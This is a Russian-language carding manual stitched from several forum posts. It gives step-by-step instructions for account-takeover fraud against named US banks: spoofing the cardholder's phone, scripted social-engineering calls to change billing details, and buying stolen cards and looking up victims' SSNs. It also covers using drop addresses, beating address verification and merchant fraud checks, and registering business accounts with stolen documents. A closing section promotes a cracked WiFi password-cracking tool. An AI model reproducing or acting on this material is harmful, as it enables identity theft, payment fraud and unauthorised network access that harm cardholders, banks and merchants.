Зачем нам нужна эта информация? Потому что большинство сайтов уровня 3, имеют VBV/MCSC защиту при чекауте. Это услуга предоставляемая банком для защиты, и дополнительных вопросов. Каждый тип карты защищен по разному, обычно вопросы:
ˆ Date of Birth (Дата рождения)
ˆ Last 4 digits of SSN (последние 4 цифры SSN)
ˆ Full name on card (Имя на карте)
ˆ Billing zip code (почтовый индекс адреса кардхолдера)
Если вы не ответите на один из этих вопросов, ордер не пройдет. Но у нас ведь все есть? Потому что мы пройдем процедуру ATO (account take over fraud). Это сложая и хитрая процедура. Читайте следующую главу, где я опишу её болеё детально.

1.2 – Account Take-Over Fraud
Вы мечтаете о кардинге электронике и вещей, чья стоимость исчисляется тысячами? Это возможно но трудно. Вы должны следовать в верном направлении. Я скардил цифровой техники болеё чем на
15000 за 2 недели, используя платиновые карты, используя шаги описанные в данном мануале.
Постараюсь вам обьяснить как.
Первое, проверьте баланс на вашей кредитке. Чтобы не выглядеть дураком, запомните одно из правил: НИКОГДА НЕ ИСПОЛЬЗУЙТЕ ЧЕКЕРЫ! Они убивают карты очень быстро. Давайте я обьясню.
Каждая транзакция получает fraud очки от 0 до 999. Эту систему используют крупнейшие 4 банка, и она называется Fair Issac. Транзакции которые набрали болеё 300 очков, будут проведены в ручном
режиме оператором, который решит, связаться с кардхолдером или пропустить перевод.
Транзакции набравшие болеё 500 очков подлежат авто отмене, карта заблокируется, и оператор свяжется с кардхолдером. Некоторые банки используют другие критерии, но принцип, остается таким же, и вещи которые добавляют fraud очки:
ˆ Сравнение с суммами которые картхолдер использовал до этого
ˆ Физическое расположение вбива
ˆ Сумма
ˆ Риск фактор используемый самим мерчантом
К примеру, 20$ потраченные картхолдером в локальном Wallmart, не вызовет ничего подозрительного, но большой ордер на 2000$ на Newegg.com, сразу наберет много fraud очков, и скореё всего будет подлежать авто-отмене транзакции, если кардхолдер, очень редко совершает покупки онлайн.
Но как это все относится к тому что я говорил? Маленькая транзакция, а затем большой ордер, сразу наберёт большой fraud score, потому что они догадываются, что вы тестите карту. Если они видят,
маленький 0.01$-5$ чардж, а через некоторое время, онлайн покупку на 1000$, они автоматом задеклайнят карту, и ваш план обрушится.
Есть способы намного лучше,как проверить карту на работоспособность, позвонить в банк, и использовать автоматические ответы. Это никак не опасно для карты, но используйте Spooftel, чтобы
ваш номер отображался, как номер картхолдера. Когда вы это сделали позвоните в банк и проверьте сколько осталось на карте. Давайте попробуем
Позвоните в банк используя ваш телефон, и будьте готовы передать информацию,которая нужна банку. Робот даст вам доступ, к последним транзакциям, балансу, и некоторым другим опциям.
Перечислю вам информацию для крупнейших 4х банков
Chase Bank – 1-800-432-3117
ˆ Full card number
ˆ Zip code
Примечание: если вы правильно заспуфали номер, у вас попросят только, последние 4 цифры на карту, в ином случае, вас попросят передать полный номер карты.
Citibank – 1-800-627-3999
ˆ Full card number
ˆ Last 4 digits of SSN
Bank of America – 1-888-421-2110
ˆ Full card number
ˆ Zip code
Capital One – 1-800-955-7070
ˆ Full card number
ˆ Last 4 digits of SSN
Если в каком либо банке, вы ввели номер карты, и система немедленно перенаправила ваш звонок оператору, без каких либо вопросов, это значит, аккаунт заблокирована, и карта невалидная. Не стоит
тратить время, на эту карту, просто положите трубку, и используйте другую карту, оператор скажет вам тоже самое и вы будете выглядеть дураком. Это очень хорошо знать последние транзакции, суммы,
так как вас возможно спросят об этом позже. Запишите их где либо, для большей убедительности, рекомендую записать до 8 транзакций.
Итак нам известен баланс, и наш кредитный лимит. КРУТО! Теперь вы знаете сколько вы можете потратить онлайн. Перед тем как побежите со слюнями вбивать, запомните пару вещей, много
больших сайтов таких как Newegg или TigerDirect, не отправляют на адрес которого нету в записях банка. И шансы того что вы удачно скардите товар очень малы. Так давайте попробуем решить эту
проблему, представляю вам Account Take Over fraud, иначе известный как ATO.
ATO это процесс, когда мошенник (вы) звонит в банк, и вносит изменения которые он хочет, без ведома картхолдера. Это предполагает звонок с оператором и использование соц инфенерии. Перед
тем как вы даже подумаете нажать 0 для разговора с оператором, убедитесь что у вас хотя бы есть эта информация в руках:
ˆ Все данные CVV
ˆ Full Billing address
ˆ DOB также запишите сколько точно лет картхолдеру, а не только дату рождения
ˆ SSB
ˆ MMN(Mothers Maiden Name) девичья фамилия матери
ˆ Employer Name (имя работодателя) необязательно, но постарайтесь найти в facebook
ˆ Модель Машины- Необязательно, но попробуйте использовать Google street view указав адрес картхолдера
ˆ Driver’s License Number,Expiration,State (данные водительских правк) необязательно
ˆ Предыдущий адрес (используйте информацию из peoplefinders.com)
ˆ Background Report (используйте информацию из peoplefinders.com)

В тех случаях когда вам неизвестен MMN, попробуйте использовать другие фамилии в background report, думайте логически. Если действительно ничего нет, постарайтесь найти все остальное.
Выучите их, и постарайтесь запомнить. Запомните вы картхолдер, карта принадлежит вам, и вы честны, просто звоните так, будто вы обращаетесь действительно в свой банк.
Обычно при звонке в банк, спрашивают 3 вопроса, этими вопросами могут быть:
DOB, SSN, Address, CVV code, Cell Phone, MMN. Если провалите один вопрос, вам будут заданы ещё два.
В конечном случае могут случиться 2 вещи:
1. Вы сделали все правильно, и оператор сделает все что вы попросите, на аккаунте картхолдера, без каких либо красных флагов
2. Оператор заподозрит ATO, и переведет ваш звонок в отдел безопасности, также его называют Verid department, и вам будуте заданы 2 OoW (Out of Wallet) вопроса. Это вопросы которые не относятся к вашему банк аккаунту. Эти вопросы основаны, на информации из background reporta, кредитной истории и т.д. Вопросы могут быть сложными и легкими, это рандомно всякий раз. Если вы провалите их, то они скажут, что ничем не могут помочь, и вы должны придти в банк лично. Также они позвонят картхолдеру. Так что можете забыть о карте.
Первое что вы должным сделать это поменять, биллинг телефон. И все. Больше ничего не делайте, так как это вызовет подозрения. Попросите поменять биллинг номер, и дайте отлежаться карте, хотя бы 5 дней.
И так, прошло время, вы готовы? Расслабьтесь, сядьте в свою удобную позу, звоните в банк, послушайте робота, и нажмите 0. Ваш звонок будет записываться.
Первый пример, если у вас есть верный MMN (это самый часто задаваемый вопрос).

Агент: Здравствуйте, спасибо что позвонили в Chase,меня зовут Ник, с кем я говорю?
Вы: Джимми Стоун
Aгент: Спасибо, мистер Стоун, могу ли я в целях безопасности, узнать девичью фамилию матери?
Вы: Донован
Агент: Спасибо, год вашего рождения?
Вы: 1 октября, 1965.
Aгент: Спасибо мистер Стоун, чем я могу помочь вам?

Перейдем ко второму примеру когда у вас нету MMN, постарайтесь угадать, не колеблясь, вы знаете
себя лучше, чем оператор, и они могу только положиться на информацию которая записана у них в
файле.
Агент: Здравствуйте, спасибо что позвонили в Chase, меня зовут Ник,с кем я говорю?
Вы: Джимми Стоун
Агент: Спасибо, мистер Стоун, могу ли я в целях безопасности, узнать девичью фамилию матери?
Вы: Донован
Агент: Но в файле совсем другая фамилия, она начинается на “С”.
Вы: На “С”? это невозможно, её имя было,Кейт Донован, она никогда не использовала другое имя!
Агент: Эмм, у вас нету никакого приходящего в голову имени начинающегося на “C”? (Если вы смогли найти что либо подобное из родственников в background report).
You: Фамилия моей тети Смит. Но я сомневаюсь, что у вас в файле записана эта информация (если же в background ничего нет).
Вы: Нет, никто в моей семье не имеёт фамилию, начинающуюся на “C”
Агент: Оу, позвольте мне внести заметку в файл для вас, можете ли вы назвать последние 4 цифры вашего SSN?
Вы: 4456.
Агент: Спасибо, дата вашего рождения?
Вы: 1 Октября, 1965.
Агент: Ваш биллинг адрес, и зип код?
Вы: 123 Fake Street, Fakeville, NY, 10008.
Агент: Спасибо, мистер Стоун, чем я могу помочь вам сегодня?
Если вы услышали эту фразу, вы все еще в игре. В другом случае вы будете перенаправлены в отдел безопасности, которые зададут вам вопросы из бэкграунда. Облажаетесь, карта мертва. Убедитесь что
вы спуфнули телефон, иначе вам зададут дополнительные вопросы. Вопросы на которые у вас скореё всего нет ответа.
Мы должны поменять, биллинг номер. Примерный диалог будет таким:
You: Я хотел бы поменять, свой биллинг номер, этот номер будет отключен завтра, и я хотел бы дать вам свой основной, чтобы вы могли позвонить мне в случае чего.
Агент: Хорошо, я вижу, можете ли вы продиктовать номер?
Вы: 234-567-8901.
Агент: Спасибо, что нибудь еще?
Вы: Нет, спасибо.
Агент: Спасибо, за то что позвонили в Chase
Когда мы прошли верификацию, можно расслабиться. И дать карте отлежаться 5 дней, не совершайте никаких покупок, картхолдер будет продолжать использовать карту. Во время вашего звонка на примере 1 (когда вы облажались, но методом СИ смогли убедить оператора), убедитесь что они исправили MMN, чтобы избежать проблем при следующем звонке. Также возьмите на заметку, если оператор ставит вас на холд, или говорит вам что ей надо проверить проверить информацию, и вы должны подождать на проводе, подождите пока они поставят линию на удержании, и положите
трубку. Обычно это значит что они собираются позвонить кардхолдеру. Если такое случается, подождите пару дней, перед тем как позвонить еще раз, и у робота вы узнаете, заблочили карту или нет. Возможно что они не позвонили ему, но в 90% случаях, они звонят. Особенно любят эту процедуру Ситибанк, которые вместо перенаправления в отдел безопасности, просто звонят кардхолдеру.
Часто вопросы меняются от звонка к звонку, но в принципе они одинакового содержания. По своему опыте я дам вам вопросы, которые обычно задают крупнейшие 4 банка, но имейте ввиду, они могут спросить совершенно другие, если подозревают что то неладное. Они могут спросить сколько вам лет, надеясь что вы не посчитали это до звонка. Если вы провалитесь, вы будете разговаривать с verid department.

Chase Bank, уровень: тяжёлый
ˆ Full name
ˆ MMN (if failed, last transaction)
ˆ Last 4 of SSN
Citibank, уровень: средний
ˆ Full name
ˆ Password (pet name, MMN, favorite hobby, or best friend, if failed, last 4 of SSN and CVV)
ˆ Mailing address
ˆ Phone number
Bank of America, уровень: легкий
ˆ Full name
ˆ (sometimes) Verbal password, which is MMN (if failed, DOB)
ˆ Last 4 of SSN
Capital One, уровень: средний
ˆ Full name
ˆ Last 4 of SSN
ˆ MMN (if failed, DOB and mailing address)

Пока карта на отлежке, неплохо было бы создать аккаунт, на сайте который вы собираетесь кардить, осматривайте товары, положите в корзину, идите чекаут, идите назад, удаляйте товары с корзины, читайте описание, просто ведите себя так как обычный покупатель. Запомните, 1000$ это большие деньги для большинства американцев, и если вы просто кидаете товары в корзину не обращая внимания на цены, вы набираете fraud очки. Ведите себя так, будто вас очень даже заботит сколько стоит тот или иной товар.
Как только вы пройдете верификацию один раз, в следующий раз будет легче, для этого аккаунта.
Допусти что 5 дней прошли, позвоните опять, и в этот раз мы добавим временный адрес, к аккаунту.
Диалог может быть примерно таким:
Вы: Я хочу, купить вещь в Newegg.com, но они просят меня внести временный адрес доставки в файл.
Я не очень уверен как это все работает, могу ли я вам просто сказать адрес, куда они должны его доставить?
Агент: Позвольте мне помочь с этим, мы можем добавить альтернативный адрес, доставки, не могли бы вы назвать мне адрес?
Вы: 123 Fraud Street, Cardingville, CA, 98765.
Агент: Без проблем, мистер Стоун, я внесла данный адрес в файл, в качестве адреса доставки, могу ли я, еще чем нибудь вам помочь?
Вы: Нет, спасибо
Агент: Удачного вам вечера
Почти все банки за исключением, Bank of America, которые меняют только почтовый адрес. Это причина по которой, карты данного банка, не подходят к 3му уровню, но некоторые магазины, могут
создать конференцию, и позвонить банку, для пущей безопасности. Chase Bank лучше всего добавляет
Shipping address, но сложнеё всего сделать ATO, это все зависит от вас, вашего уровню я умения.
Как только вы добавили адрес в аккаунт, время для вбива, зайдите в свой аккаунт в магазине, поковыряйтесь в магазине еще. Постарайтесь, не делать ордер больше 2000. Введите верный верный биллинг адрес, проверьте информацию несколько раз. Введите биллинг номер телефона (который мы уже добавляли). Затем ваш Shiping адрес. Проверьте ещё раз. И отправляйте. У вас могут спросить VBV или MCSC, но ведь у нас есть вся информацию. Введите инфу которую они хотят, и подтвердите ордер. Также некоторые большие сайты, спросят у вас DOB, а также 3 вопроса, вопросы взяты из public records, и для нас они не должны предоставлять большой сложности. Если вы провалитесь, вам будут заданы еще вопросы. Если вы облажаетесь с двумя и болеё, ордер будет поставлен на ожидание, и вы все усложните, постарайтесь все сделать верно.
Могут случиться 2 вещи, когда вы подтверждаете ордер. Это зависит от сумм которые тратил кардхолдер до этого, и это усложнит или облегчит задачу для вас
1) Ордер пройдет без проблем, и он будет в статусе *ожидание*
2) Транзакция отклонена, и на сайте будет написано позвоните в банк. Если это случилось, позвоните в банк, система отреагирует что карта угнана,и без всяких ответов вас перенаправят. И фрод агент ответит вам. Помните, карта ваша, скажите им что вы авторизуете транзакцию, и вы понятия не имеёте почему она отклонена. Обычно это легко,если у вас есть необходимая информация. Звоните сразу как вы получите деклайн, иначе картхолдеру позвонят, и ваш план выгорит.
Итак, ордер отправлен в статус ожидания. Следующей частью, я расскажу вам, почему некоторые ордера, отменяются. Наберите терпения, вздохните, и переходите к следующей части.

1.3 - Почему ордера отменяют
Когда сайт получает ордер свыше 1000$, мы должны понимать, что они хотят защитить себя. Что они делают впервую очередь, для того чтобы верифицировать транзакцию? Правильно, они просто звонят в банк, и сверяют биллинг номер, либо звонят на него. Звонок будет совершен к вам, или картхолдеру, зависит от того, сделали ли вы правильно ATO.
Эта причина почему новички, вбивают данные кредитки, и надеяются получить бесплатный Iphone от Apple store. Они не дураки,и они хотят защитить себя. В любом случае, если вы поменяли биллинг номер, вам позвонят, и вы подтвердите ордер. Не так быстро, звонок от них это не просто “хей, всё впорядке?”, обычно это звонки при которых они проверяют настоящий ли это кардхолдер, и иногда спрашивают вопросы, близкие к тому что задавал вам Verid department банка, но все они взяты из Public Records. Также они спросят у вас по поводу shipping адреса, который мы благополучно внесли в файл, также позвонят в банк. В редких случаях, они создадут конференцию с вами и банком, но вам будут заданы обычные вопросы вроде, последних 4х цифр SSN, DOB, последние транзакции и т.д Если вы новичок, попробуйте просто сделать вбив, в надежде получить телефон нахаляву, вы просто увидите как ваш ордер отменят, даже не удосужив вас звонка. По этой причине, я часто вижу посты типа “Кардинг уже мёртв”.
Если вы прошли верификацию, оператор скажет вам, что все ок, и ваш ордер будет отправлен вам сегодня. Отличная новость! На этом этапе,я получил 100% своих ордеров. У меня никогда не было проблем, после верификации. Теперь вы можете попробовать скардить другой сайт. Вашу карту уже можно отнести к 4 уровню. Потому что аккаунт полностью в вашем распоряжении, и вы совершали с него покупки, с вашим биллинг номером и шипинг адресом. Дожидайтесь пока ваши ордера будут отправлены, и переходите к следующему магазину.
Я рекомендую, кардить утром, чтобы избежать долгого чарджа на карте. Вы не можете знать, как часто кардхолдер проверяет стэйтмент. У меня были карты которые умирали за час, а некоторые жили по 3 месяца. Как только пак отправлен, переходите к следующему магазину, пока она не умрет.
Как только, карта умерла, не связывайтесь никак с дропом, если вы юзаете человека, или не появляйтесь по адресу, если в качестве дропа вы используете сьемную квартиру. По альтернативному
адресу доставки они могут отправить полицию,на это место. Дроп он как презерватив, используйте его, затем выкиньте, больше им пользоваться нельзя.

1.4 - Дропы
У многих наших кардеров, понятие дроп, связано с человеком, которому отсылают паки, и он перенаправляет товар Далее. Не буду описывать этот процесс, так как сам не люблю его, у этих людей потом возникают проблемы, а быть причиной чужому горю я не хочу, да и кидают, они тоже часто. Я в качестве дропа юзаю, квартиры, склады куда отправляется мое добро. Это должно быть место никак не связаное с вами. Найти очень легко, зайти на craiglist и найти дом в аренду, либо проехать по району, и поискать дома для продажи которые обычно пустуют, удостоверьтесь чтобы в нем не было, больших окон, в котором видно что дом пустует. И это не должна быть палатка, или какая нибудь страшная халупа, найдите достойное жилище, они не так дороги.
И вот этот день настал, на трэке появилась надпись “Out for delivery”. Круто! Теперь проверьте нужна ли подпись. Все почтовые службы требуют подпись, кроме UPS.
Метод 1: Дома никого нет.
Если подпись не нужна, можно оставить записку на двери, “Дома никого нет, пожалуйста оставьте пак здесь, это возьмите как подпись”, также можно оставить напечатаный ордер конфирмэйшн, в котором виден трэк номер. Дальше зависит от водителя, оставить пак или нет, обычно они без проблем оставлют пак. Как только он уехал, берите товар и валите. Если все хорошо можете пропустить 2 метод, и продолжите чтение.
Метод 2: Ведите себя так, будто вы у себя дом.
Обычно он нужен, для паков где, подпись в любом случае нужна, вам нужно будет встретиться лицом к лицу с водителем. Запомните одну вещь, можете расслабиться. Работа водителя не ловить мошенников, а просто убедиться в том что, пакет, доставлен по назаначению (но в лицо ему это говорить тоже не надо), ваша задача просто в том, чтобы убедить его, что пак ваш, на остальное им наплевать, вынесите напечатанный confirmation page, track номер, откройте ваш телефон поглядывая на часы (используйте VPN!), будто бы вы ждете его. Если вы ждете у дропа, уберите все надписи “for sale”, “for rent”, и сидите на траве, что угодно, также не забудьте позвонить в банк, и узнать у робота, жива ли карта, дабы удостовериться, что вместо почты к вам не едут копы. Также запомните что если вы выходите из машины, когда почтальон приезжает, вызовет у него подозрения.
Поприветствуйте его, покажите бумаги, подпишите, и переходите к следующей части.
Иногда водители могут выебываться, и спрашивать, почему ваше имя, не такое же, как на паке, вы можете сказать что, что вы переёхали, и послали на чужое имя, потому что у вас проблемы с таможней, если они и дальше будут выебываться, можете сказать ему что позвоните в UPS, и оставите жалобу, обычно они успокаиваются после этого, короче говоря, с приемом паков у меня проблем не было.
После того как пак получен.
Иногда я пропуская эту часть, так как ленивая сволачь, но вы должны быть очень осторожны, ваша свобода бесценна, и 5 минут стоят того. Проедьте к ближайшему парку или публичному месту, проверьте пак на наличие, жучков, GPS приемников и т.д, затем уничтожьте лэйбл, и выбросьте коробку. На данном этапе, вы можете быть уверены, что вы охуеть какой классный кардер. Едьте домой, расслабьтесь, вы уделали банк, и сайт, можете повыебываться этим на форумах. Если карта досих пор жива, и никаких жучков вы не нашли, вы можете делать то же самое с дропом опять и опять, пока карта не сдохнет. Как то раз, я накардил электроники, на 14000 на одну карту, это была, денежная неделя.

1.5 – Chargebacks
Постоянный вопрос на форумах, когда карта умирает, и открывается диспут, кто попадает под удар?
В случаях когда карта используется с чипом и пином, в тех странах где используется эта технология, банки несут потери, при таких диспутах.
В других случаях, всю материальную ответственность, к сожалению несет продавец. К примеру если вы скардите ноутбук на newegg на 2000$, они понесут убытки около 1600$, потому что вы украли у них, и теперь они должны продать 5 таких же ноутбуков, чтобы просто покрыть убытки. Теперь вы понимаете почему такие большие мерчанты как TigerDirect и Newegg, делают так улучшают свою защиту, чтобы их не скардили. В большинстве случаев, они смиряются с этим и, понимают что они облажались в защите. Но мерчанты поменьше, обращаются в полицию, будет ли полиция расследовать это? Это зависит от суммы, к примеру, если мерчант заявит о 200$, в 99% они даже дело не будут открывать. Но если это будет 3000$,с одного штата, с доставкой в ближайший город, они могут заняться этим.
Также это зависит от частоты обращений, и общей сумме, они могут связать все, и понять что это один человек. Старайтесь, проводить все ваши ордеры, без общей связи.
Также зависит от картхолдера, который решит, писать заявление или нет, но обычно все затраты им возмещает банк, и шансы что они сделают это чрезвычайно малы. Но есть придурки для которых это принципиально, и они будут обращаться в полицию опять и опять. Опять же, это все рандомно, и зависит от многих факторов, также от того в каком именно городе, произошла кража.
Так что запомните, когда вы кардите магазин, они несут от этого убытки, и они хотят защитить себя.
Так что вы должны быть умны, и представить себя на месте, хозяина, как мне не недать обмануть
себя мошенникам? Иногда вы будете получать, емейлы от магазинов, спрашивающих вас о chargeback’ах, игнорируйте эти письма. Не надо быть полным уебаном и отвечать “хаха я вас сделал”, просто оставьте это.

1.6 – Выбираем лучшие карты
Если у вас нету возможности достать Full’ки, а в наличии только автошопы, есть способ, как выжать с них самое лучшеё, и сохранить свои деньги, но для этого нужно немного больше времени. Это работало на многих автошопах до поры времени, когда до покупки карты были видны, имя и зип код карты. На некоторых автошопах эта инфа есть до сих пор.
Первое, начинаем поиск по бину. Если вам понравился работать методом ATO, и вы хотите хорошие карты,бины 426684 и 438854 отлично подойдут для этого, но конечно же, все зависит от вашего желания. Итак вы взяли карту, самое время попробовать найти их SSN,DOB, на Backstab, SSNFinder или SSNDOB, в 50% вы не найдете особенно если кардхолдер моложе 40 лет. Просто оставляем эту карту для уровня 2 или для шопов с слабым антифродом, шопы с хорошим антифродом, без полной информации не сможете взять. Итак допустим у нас получилось найти SSN и DOB.
Идём на peoplefinders.com и находим background, сравните DOB c тем что у вас уже имеётся, логически сопоставьте информацию, чтобы убедиться,что вы правы на 100%. Теперь у нас есть Full’ка. Теперь можно переходить на archives.com или ancestry.org, чтобы найти MMN (девичья фамилия матери).
Поделюсь как искать:
Скардите аккаунт на одном из 2х этих сайтов, можно использовать карты 2го уровня, не должно доставить проблем, это легко. Возьмите имя матери кардхолдера из background report’а, и ищите её по ФИО и дате рождения, укажите “marriage (замужество) records”, если поиск ни к чему не привёл, ищите “birth records”. Если и там ничего нет, попробуйте поискать по данным женитьбы отца кардхолдера. Не все штаты, сделали все эти записи публичными, потому возможно что вы ничего не найдете, но не стоит расстраиваться. Мы всегда можем применить соц инженерию, как мы уже делали это. Конечно, найти продавца фуллок намного упростит нам дело, но их не так много, а еще меньше действительно с хорошим материалом. Если вы найдете автошопы которые предполагают посмотреть ФИО и zip до покупки, замечательно! Просто проделайте то, что было описаны свыше. И проверьте баланс звонком в банк.

1.7 - Коммерческий Кардинг
Хотите другой способ (я так полагаю легче), чтобы вещи были посланы дропу, и устали от кардинга, newegg и bhphoto? Ок, поделюсь с вами еще одним методом. Этот метод работает лучше всего для
Канады, но также хорош для США.
Вам нужно найти любого крупного продавца, который продает только коммерческим покупателям (что значит только для владельцев бизнеса). Допустим для кардинга компьютера и их запчастей, вы можете попробовать ASI, Synnex, и так Далее. Наша цель найти регистрационный сертификат, в том городе котором вы планируете дроп товара. Эти сертификаты обычно публичные, и могут быть найдены на многих сайтах, зависит от штата. Помните вы всегда можете скардить подписку, на сайтах где эта инфа предоставляется. Как только вы достали сертификат, мы готовы атаковать. Подайте заявку для регистрации, внесите все данные, также внесите адрес дропа, и постарайтесь чтобы он был как можно ближе, также внесите номер, по которому они могут позвонить вам. Оба этих шопа
(Synnex,ASI) обычно не звонят, но это на всякий случай. Чтобы ваш аккаунт подтвердили обычно уходит 1-2 дня. “Ваше имя” это имя настоящего владельца бизнеса. На Credit applicaton просто
напишите “no credit”, и дайте им понять, что вы оплатите до того как товар будет отправлен.
На Credit authorization form, внесите имя, адрес, номер карты, exp.date, cvc code. Дайте им поменять, что этот человек, вроде менеджера или торговый представитель в вашем бизнесе. Как только вашу заявку подтвердили, мы готовы делать ордера на большие суммы. Причина по которой они не проводят верификацию, при отправке товара, это то, что у них почти никогда не бывает фрод ордеров. Они полагают что комерсы, всегда все делают по закону,но по закону, мы просто использовали чужие документы, чтобы они подумали, что мы владельцы бизнеса. Я вносил ордера болеё чем на 5000$ используя этот метод, мерч считает эту операцию лоу-рисковой, потому у меня было очень мало деклайнов на карте, а верификация почти отсутствует.
Вы можете попробовать других коммерческих продавцов. Теперь вы играете в большую игру, и ваши возможности безграничны. И да никогда не появляйтесь на месте дропа товара, потому что, когда карта умрёт, они действительно захотят понять что же произошло.

1.8 - NewEgg и TigerDirect
Всегда хотели скардить, эти 2 мерчанта, чтобы получить электронику? Постараюсь обьяснить вам как.
Это не самое сложное, если вы знаете что делать, и у вас есть навыки в соц.инженерии. По крайней
мере вам будут нужны:
1) ATO аккаунт кардхолдера, с номером который вы поменяли на свой
2) Адрес доставки указанный в файле банка
3) Полная инфа из бэкграунда
4) История о том, почему вы хотите доставить на этот адрес
5) Район обитания кардхолдера: рестораны, торговые центры
И запомните, адреса мэйл форвардинг компаний в блэклистах у этих шопов. Не пытайтесь шипать на MyUS, Bongo, Shopfans и так Далее, ордер автоматом отменят. Какой американец будет US карту, для доставки в форвардинг компанию, чтобы те отправили его дальше? Ни один. Вам нужен нормальный дроп. Условие номер 5,кажется странным, но это правда. Некоторые операторы, включая меня могут спросить, “можете ли вы назвать ресторан, который находится возле вашего дома?” чтобы убедиться что вы и есть кардхолдер. Так что неплохая идея, просмотреть окрестности, если вдруг такое случится.
Вы поблагодарите себя затем.
Ну давайте займемся серфингом по сайту, читайте описания, осматривайтесь, ведите себя как обычный покупатель. Проделайте это 1-2 дня, отправляйте ордер, и старайтесь не делать ордер больше 2000$. Ордер будет в статусе “ожидание”, и вы должны будете поговорить с verification department. Я обьясню вам, процедуру для TigerDirect, но Newegg несильно отличается.
Сайт TigerDirect попросит вас предоставить адрес и информацию о кредитке, затем вы должны будете пройти процедуру VBV/MCSC. После этого, они спросят дату рождения. Затем 3 проверочных вопроса.
Эта информация взята из бэкграунда. Постарайтесь найти всю информацию которую сможете.
Ответьте на 3 вопроса, настолько быстро как сможете, не думая долго. Если вы провалите один вам будет задан еще дополнительный, ответите неверно 2 или болеё, забудьте о карте. Как только вы прошли это. Ваш ордер будет в статусе ожидания. Вы должны позвонить в verification department.
Обычно диалог проходит следующим образом:
Агент: Спасибо что позвонили в TigerDirect verificationdepartment, могу я узнать номер вашего ордера?
Вы: 123445
Агент: Спасибо, как вас зовут?
Вы: Джим Стоун
Агент: Спасибо мистер Стоун, позвольте мне проверить ваши данные (вы будете на удержании, около 2 минут)
Агента: Спасибо за ожидание, (имя на ордере) арендатора в адресе доставки?
Вы: Да (другой ответ, задейклайнит ордер)
Агент: Я не могу найти этого человека в системе. Поэтому мы можем сделать 2 вещи. Мы доставим товар по вашему билинг адресу, или вы должны будете позвонить в банк, чтобы указать его в качестве альтернативного, и мы сможем отправить его туда
Вы: Я уже позвонил в банк, и они добавили этот адрес в файл
Агент: Оу, тогда позвольте мне проверить эту информацию, пожалуйста подождите (вы будете на удержании, пока они звонят в банк, чтобы проверить информацию, иногда они могут создать конференцию с банком и вами)
Агент: Все впорядке, адрес доставки указан в файле. Спасибо, могу ли я позвонить вам по номеру 917-603-0141? (номер который мы указали в качестве основного кардхолдера)
Вы: Да конечно
Агент: спасибо, ожидайте на линии (телефон должен зазвенеть, поднимите трубку, либо ордер отменят).
Агент: Спасибо большое, мистер Стоун. Мы отправим вам ваш ордер, сегодня.
Заметили сколько трудностей в этом диалоге? Вы должны заставить поверить их, что имя на адресе доставки, арендатор по этому адресу. К примеру, если имя кардхолдера, Джимми Стоун, вы можете отправить его на имя Дэвид Стоун, и сказать что это ваш сын. Но проверьте эту информацию в бэкграунде, и имейте их данные о дате рождения, иногда они могут спросить вас.

Также хорошо будет избегать, Hotmail адреса, любой можешь сделать фальшивую почту, под именем другого. В идеале будет хорошо если у вас будет свой домен и почта на нём. Если вы прочтете следующую главу (слив методом Stripe), вы увидите насколько это легко. Допустим ваш фэйковый шоп Besclothes.com, а имя вашего кардхолдера Джимми Стоун, вы можете создать емэйл [email protected], и это будет выгляеть как комерческий адрес, и понизит фрод очки.
Поверьте мне, это играет большую роль, при кардинге трудных мерчантов.
В следующий раз, убедитесь что вы сможете поднять телефон, когда они звонят по нашему “биллинг номеру”. Если вы все сделаете правильно, значит вы готовы забрать ваш ордер. Они не будут спрашивать, кучу документов, все было сделано по телефону.


Перехват и подбор паролей WiFi - взлом WEP, WPA, WPA2, WPS

Программа для перехвата и подбора паролей WI-FI.
AirSlax 5 Pro + Dictionary Generator v.1.0 Portable + Доп.модули (2014/РС/Русский) взломанная
Офф сайт airslax.com
Видео - Создание загрузочной флешки AirSlax
Платный перебор через словари 5$ (для тех кому лень) оплата только после подбора
Доп. модули (иногда не идет запуск, глюк от каких то модулей)
Словарь WPA-PSK WORDLIST 3 Final

Описание
Платформа: Windows XP, Windows Vista, Windows 7, 8, 8.1. /Linux
Возможности AirSlax 5 PRO:
- Перехват и подор паролей WiFi сетей со всеми видами шифрования.
- Запуск с USB Flash - Операционная система установленная на вашем компьютере не имеёт значения
и находится в полной безопасности, т.к. все данные и изменения записываются на флешку.
- Поддержка большого количества WiFi адаптеров для перехвата.
- Использование мощности видеокарты для подбора паролей WPA/WPA2, что позволяет увеличить
скорость подбора в десятки и сотни раз.
Перехват и подбор паролей:
- WPA2 (словарь 1,2 Gb в комплекте)
- WEP (подбор за 5-15 минут)
- WPS (пароль любой сложности)
Поддержка GPU:
Подбор пароля с использованием видеокарт:
- AMD
- NVIDIA
Скорость подбора пароля в 10-100 раз выше чем на процессоре (CPU)

Список дополнительных модулей (программ):
Chrome,
Firefox,
Skype,
LibreOffice,
Принтер.
Как добавить:
1. Распаковать архив.
2. Выбрать нужный модуль (программу)
3. Скопировать в папку AirSlax5base\porteus\modules на флешке.


Аналог смены билинга на ролках
И так, сейчас я раскрою одну из тем вещевухи, думаю для многих это приват.
Думаю все знают о существование шопов без AVS, это когда вы указывает адрес дропа в bill info.
Но как не печально, большинство шопов все-таки с AVS.
Но и это можно обойти! Как? Расписано дальше.
Первое что на понадобится это дроп. Рад вам представить моего дропа, его данные:
Harry Potter, 26 hogwarts str., Los Angeles, CA, 90004, US.
Что бы обмануть мерчант с AVS нам нужно найти сс с таким же zip'ом.
После долгих поисков у нас на руках есть пару сс подходящих под данный критерий. Едем дальше.
Идём в нужные вам шопы, выбираем товар, тыкаем checkout. Сейчас нам предложили ввести адрес доставки и bill info, тыкаем чекбокс напротив надписи "Слать на билинг адрес".
Заполняем bill info.
FName = Harry (можно и данные холдера, если дроп примет)
LName = Potter (можно и данные холдера, если дроп примет)
Billing address = 26 hogwarts str.
Zip Code = 90004
City = Los Angeles
State = CA
Тыкаем оплатит, радуемся. Ордер успешно оформлен, деньги списались.
Почему так произошло?
Zip дропа = Zip'у холдера. Это самый главный момент!
City, State, Country дропа = City, State, Country холдера.
Помесь сути enroll'а с bill=ship.))
Таким способом была стащена туева куча паков таскал даже с самых крупных магазинов.


DNSCrypt как важная составляющая анонимности в сети

DNS - фундамент интернета в нашем привычном понимании. Именно эта система позволяет не заморачиваться запоминанием ip адресов сайтов, а обращаться к ним по имени хостов.
С нашей точки зрения уязвимость этой системы в том, что весь DNS-трафик (ваши запросы и ответы сервера) идет по сети в открытом виде и доступен для прослушивания третьими лицами. Именно таки логи в первую очередь смотрят системные администраторы и многие другие люди (провайдер, органы) для анализа вашего перемещения по сети.
